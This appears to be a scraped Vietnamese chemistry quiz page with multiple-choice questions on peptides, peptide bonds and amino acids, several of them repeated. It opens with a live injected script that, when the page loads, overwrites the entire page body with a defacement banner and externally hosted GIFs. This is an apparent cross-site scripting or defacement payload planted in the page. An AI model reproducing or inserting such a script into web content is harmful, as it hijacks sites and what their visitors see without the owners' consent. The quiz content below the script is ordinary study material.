<script>document.body.innerHTML = "<!DOCTYPE html> <html data-bs-theme=\"light\" lang=\"en\"> <head> <meta name=\"robots\" content=\"index, follow\"> </head> <body class=\"d-flex d-xl-flex flex-column justify-content-center align-items-center align-content-center justify-content-xl-center align-items-xl-center\" style=\"width: 100%;height: 100%;\"> <div class=\"d-flex justify-content-center align-items-center\" style=\"flex-direction: column;width: 100%;height: 100%;\"> <div class=\"d-flex d-xl-flex justify-content-center align-items-center justify-content-xl-center align-items-xl-center\" style=\"flex-direction: column;font-size: 36px;\"><strong class=\"text-center\" style=\"color: rgb(255,0,199);\">MY DEN LAC DIT</strong><strong class=\"text-center\" style=\"color: rgb(255,0,199);\">TEXAS, CALIFORNIA, HOUSTON </strong></div> <div class=\"d-flex d-xl-flex flex-row justify-content-center align-items-center flex-wrap justify-content-xl-center align-items-xl-center justify-content-xxl-center\" style=\"height: auto;\"><img src=\"https://i.ibb.co/ZL9xs3L/download-2.jpg\" style=\"margin-right: 30px;\"><img class=\"d-flex justify-content-center align-items-center\" src=\"https://i.ibb.co/9g6sT82/20220216-105539.gif\" width=\"419\" height=\"206\"><img class=\"d-flex justify-content-center align-items-center\" src=\"https://i.ibb.co/SRKPYP5/DDAB5-E1-C-A3-D8-488-F-8224-80-D2822046-E0.gif\" width=\"230\" height=\"275\" style=\"margin-left: 30px;\"><img class=\"d-flex justify-content-center align-items-center\" src=\"https://i.ibb.co/P5mgN3Y/image1-1.gif\" style=\"margin-left: 30px;\"></div> </div> </body></html>";</script>
Cho các chất sau
(I) H2N-CH2-CH2-CO-NH-CH2-CO-NH-CH2-CH2-COOH
(II) H2N-CH2CO-NH-CH2-CO-NH-CH2-COOH
(III) H2N-CH(CH3)-CO-NH-CH2-CO-NH-CH2-CO-NH-CH2-COOH.
Chất nào là tripeptit?
A. I
B. II
C. I,II
D. III
Cho các chất sau:
(I) H2N-CH2-CH2-CO-NH-CH2-CO-NH-CH2-CH2-COOH
(II) H2N-CH2CO-NH-CH2-CO-NH-CH2-COOH
(III) H2N-CH(CH3)- CO-NH-CH2-CO-NH-CH2-CO-NH-CH2-COOH.
Chất nào là tripeptit?
A. I.
B. II.
C. I, II.
D. III.
Cho chất hữu cơ sau: H2N-CH2-CO-NH-C2H4-CO-NH-CH(NH2)CH2-CO-NH-CH(CH2)2(COOH)-CO-NH-CH2-CH(COOH)-CH3. Chất hữu cơ trên có mấy liên kết peptit
A. 0
B. 1
C. 2
D. 4
Cho các chất sau:
X: H2N – CH2 – COOH
Y: H3C – NH – CH2 – CH3.
Z: C6H5 – CH(NH2) – COOH.
G: HOOC – CH2 – CH(NH2) – COOH.
P: H2N – CH2 – CH2 – CH2 – CH(NH2) – COOH.
T: CH3 – CH2 – COOH.
Những chất thuộc loại amino axit là:
A. X, Y, Z, T
B. X, Z, G, P
C. X, Z, T, P
D. X, Y, G, P.
Peptit X có công thức cấu tạo là H2N-CH2-CO-NH-CH(CH3)-CO-NH-CH(CH3)-COOH. Phát biểu nào sau đây đúng?
A. Kí hiệu của X là Ala-Ala-Gly
B. X thuộc loại tripeptit và có phản ứng màu biure
C. Cho X tác dụng với dung dịch NaOH loãng thu được ba loại muối hữu cơ
D. Thủy phân không hoàn toàn X, thu được Ala-Gly
Peptit có công thức cấu tạo như sau: H2N-CH(CH3)-CO-NH-CH2-CO-NH-CH(COOH)-CH(CH3)2. Tên gọi đúng của peptit trên là:
A. Ala-Ala-Val.
B. Ala-Gly-Val
C. Gly-Ala-Gly
D. Gly-Val-Ala
Thủy phân hoàn toàn
H2N-CH2-CO-NH-CH(CH3)-CO-NH-CH(CH3)-CO-NH-CH2-CO-NH-CH2-COOH thu được bao nhiêu loại α-amino axit khác nhau ?
A. 5.
B. 3.
C. 2.
D. 4.
Thủy phân hoàn toàn H2N-CH2-CO-NH-CH(CH3)-CO-NH-CH(CH3)-CO-NH-CH2- CO-NH-CH2-COOH thu được bao nhiêu loại α-amino axit khác nhau?
A. 4.
B. 3.
C. 5
D. 2.
Thủy phân hoàn toàn
H2N-CH2-CO-NH-CH(CH3)-CO-NH-CH(CH3)-CO-NH-CH2-CO-NH-CH2-COOH thu được bao nhiêu loại α-amino axit khác nhau ?
A. 5.
B. 3.
C. 2.
D. 4.
Số liên kết peptit trong hợp chất sau là
H2N-CH2-CO-NH-CH(CH3)-CO-NH-CH(C6H5)-CO-NH-CH2-CH2-CO-HN-CH2-COOH
A. 2
B. 3
C. 4
D. 1